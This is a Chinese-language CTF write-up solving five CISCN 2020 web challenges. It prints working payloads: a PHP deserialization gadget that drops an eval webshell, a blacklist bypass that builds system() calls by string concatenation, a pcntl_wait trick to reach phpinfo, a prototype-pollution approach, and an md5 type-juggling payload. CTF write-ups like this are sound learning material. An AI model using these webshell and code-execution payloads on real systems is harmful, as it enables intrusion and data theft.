ciscn-2020-web

前言

一切都是自己的理解，其中可能有各种错误，仅供参考。

easyphp

//题目环境：php:7.4.8-apache
$pid = pcntl_fork();
if ($pid == -1) {
  die('could not fork');
}else if ($pid){
  $r=pcntl_wait($status);
  if(!pcntl_wifexited($status)){
    phpinfo();
  }
}else{
  highlight_file(__FILE__);
  if(isset($_GET['a'])&&is_string($_GET['a'])&&!preg_match("/[:\\\\]|exec|pcntl/i",$_GET['a'])){
    call_user_func_array($_GET['a'],[$_GET['b'],false,true]);
  }
  posix_kill(posix_getpid(), SIGUSR1);
}

这个题给出了一个php的版本：7.4.8，可能是考这个版本的某个漏洞，就去翻阅php7.4.9的修复，找到了一个东西

1597925484829

但是经过自己测试，感觉并没有什么用，首先我们访问这个网页是由子进程返回的，如果需要利用就还需要创建一个进程，再利用这个新的子进程进行利用。而主进程中有个phpinfo()，想着怎么才能看子进程，经过查阅发现pcntl_wait的作用，那么我们执行以下这个函数就能够回到主进程，进而调用了phpinfo()。

1597925708703

payload如下：

http://eci-2ze9505q64pi4jbaggsb.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait

在phpinfo中找到了flag。

babyunserialize

www.zip找到源码，进行审计，看到unserialize就知道是反序列化的题，全局找destruct函数，发现jig.php中的desruct函数中有个write方法，接下来的思路就是利用这个来进行写shell，关键代码如下。

/**
*	save file on destruction
**/
function __destruct() {
	if ($this->lazy) {
		$this->lazy = FALSE;
		foreach ($this->data?:[] as $file => $data)
			$this->write($file,$data);
	}
}

/**
*	Write data to memory/file
*	@return int
*	@param $file string
*	@param $data array
**/
function write($file,array $data=NULL) {
	if (!$this->dir || $this->lazy)
		return count($this->data[$file]=$data);
	$fw=\Base::instance();
	switch ($this->format) {
		case self::FORMAT_JSON:
			$out=json_encode($data,JSON_PRETTY_PRINT);
			break;
		case self::FORMAT_Serialized:
			$out=$fw->serialize($data);
			break;
	}
	return $fw->write($this->dir.$file,$out);
}

直接给出payload，注意带上命名空间。

<?php
namespace DB{
    
class Jig {

    //@{ Storage formats
    const
        FORMAT_JSON=0,
        FORMAT_Serialized=1;
    //@}

    protected
        //! UUID
        $uuid,
        //! Storage location
        $dir='./',
        //! Current storage format
        $format,
        //! Jig log
        $log,
        //! Memory-held data
        $data=['zed.php'=>['<?php eval($_REQUEST[1]);?>']],
        //! lazy load/save files
        $lazy=1;

    }
}
namespace{
    $shell= new DB\Jig;
    echo urlencode(serialize($shell));
}
?>

连接上去后发现没法执行命令，使用蚁剑的bypass disable_functions插件逐个尝试就进行了绕过，最后flag在/tmp目录下。

rceme

这个题没啥好说的，开始我们做出的题是在phpinfo中找到的flag，来构造一个phpinfo试试，本题代码如下。

<?php
error_reporting(0);
highlight_file(__FILE__);
parserIfLabel($_GET['a']);
function danger_key($s) {
    $s=htmlspecialchars($s);
    $key=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','$','system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert');
    $s = str_ireplace($key,"*",$s);
    $danger=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session','sql','mkdir','copy','fwrite','del','encrypt','$','system','exec','shell','open','ini_','chroot','eval','passthru','include','require','assert','union','create','func','symlink','sleep','ord','str','source','rev','base_convert');
    foreach ($danger as $val){
        if(strpos($s,$val) !==false){
            die('很抱歉，执行出错，发现危险字符【'.$val.'】');
        }
    }
    if(preg_match("/^[a-z]$/i")){
        die('很抱歉，执行出错，发现危险字符');
    }
    return $s;
}
function parserIfLabel( $content ) {
    $pattern = '/\{if:([\s\S]+?)}([\s\S]*?){end\s+if}/';
    if ( preg_match_all( $pattern, $content, $matches ) ) {
        $count = count( $matches[ 0 ] );
        for ( $i = 0; $i < $count; $i++ ) {
            $flag = '';
            $out_html = '';
            $ifstr = $matches[ 1 ][ $i ];
            $ifstr=danger_key($ifstr,1);
            if(strpos($ifstr,'=') !== false){
                $arr= splits($ifstr,'=');
                if($arr[0]=='' || $arr[1]==''){
                    die('很抱歉，模板中有错误的判断,请修正【'.$ifstr.'】');
                }
                $ifstr = str_replace( '=', '==', $ifstr );
            }
            $ifstr = str_replace( '<>', '!=', $ifstr );
            $ifstr = str_replace( 'or', '||', $ifstr );
            $ifstr = str_replace( 'and', '&&', $ifstr );
            $ifstr = str_replace( 'mod', '%', $ifstr );
            $ifstr = str_replace( 'not', '!', $ifstr );
            if ( preg_match( '/\{|}/', $ifstr)) {
                die('很抱歉，模板中有错误的判断,请修正'.$ifstr);
            }else{
                @eval( 'if(' . $ifstr . '){$flag="if";}else{$flag="else";}' );
            }

            if ( preg_match( '/([\s\S]*)?\{else\}([\s\S]*)?/', $matches[ 2 ][ $i ], $matches2 ) ) {
                switch ( $flag ) {
                    case 'if':
                        if ( isset( $matches2[ 1 ] ) ) {
                            $out_html .= $matches2[ 1 ];
                        }
                        break;
                    case 'else':
                        if ( isset( $matches2[ 2 ] ) ) {
                            $out_html .= $matches2[ 2 ];
                        }
                        break;
                }
            } elseif ( $flag == 'if' ) {
                $out_html .= $matches[ 2 ][ $i ];
            }
            $pattern2 = '/\{if([0-9]):/';
            if ( preg_match( $pattern2, $out_html, $matches3 ) ) {
                $out_html = str_replace( '{if' . $matches3[ 1 ], '{if', $out_html );
                $out_html = str_replace( '{else' . $matches3[ 1 ] . '}', '{else}', $out_html );
                $out_html = str_replace( '{end if' . $matches3[ 1 ] . '}', '{end if}', $out_html );
                $out_html = $this->parserIfLabel( $out_html );
            }
            $content = str_replace( $matches[ 0 ][ $i ], $out_html, $content );
        }
    }
    return $content;
}
function splits( $s, $str=',' ) {
    if ( empty( $s ) ) return array( '' );
    if ( strpos( $s, $str ) !== false ) {
        return explode( $str, $s );
    } else {
        return array( $s );
    }
}

php这些是黑名单，采用字符串拼接的方式来构造例如'sy'.'stem'，接下来的工作就是读解析if的代码了，按规则写出模板代码即可。

poc:

a={if:1)(%27sy%27.%27stem%27)(ls);//}{end%20if}

最后flag还是在phpinfo中，即payload为：

a={if:1)(%27ph%27.%27pinfo%27)();//}{end%20if}

littlegame

nodejs的题，第一次做，还是挺有意思的，需要点前置知识：原型链污染。这个题的代码比较简单，并且是一个cve，而且有poc可以来参考，参考连接： https://snyk.io/vuln/SNYK-JS-SETVALUE-450213 。关键代码如下：

router.post("/DeveloperControlPanel", function (req, res, next) {
    // not implement
    if (req.body.key === undefined || req.body.password === undefined){
        res.send("What's your problem?");
    }else {
        let key = req.body.key.toString();
        let password = req.body.password.toString();
        if(Admin[key] === password){
            res.send(process.env.flag);
        }else {
            res.send("Wrong password!Are you Admin?");
        }
    }

});
router.post("/Privilege", function (req, res, next) {
    // Why not ask witch for help?
    if(req.session.knight === undefined){
        res.redirect('/SpawnPoint');
    }else{
        if (req.body.NewAttributeKey === undefined || req.body.NewAttributeValue === undefined) {
            res.send("What's your problem?");
        }else {
            let key = req.body.NewAttributeKey.toString();
            let value = req.body.NewAttributeValue.toString();
            setFn(req.session.knight, key, value);
            res.send("Let's have a check!");
        }
    }
});

在DeveloperControlPanel方法中，如果是admin就能够看到flag了，而Privilege中可以修改key跟value，使用参考链接中的poc进行测试，过程如下：

1597927612812

1597927669535

easytrick

代码如下：

<?php
class trick{
    public $trick1;
    public $trick2;
    public function __destruct(){
        $this->trick1 = (string)$this->trick1;
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
            die("你太长了");
        }
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

套娃题的老套路，payload如下：

<?php
class trick{
    public $trick1="INF";
    public $trick2=INF;
}
echo serialize(new trick());

?>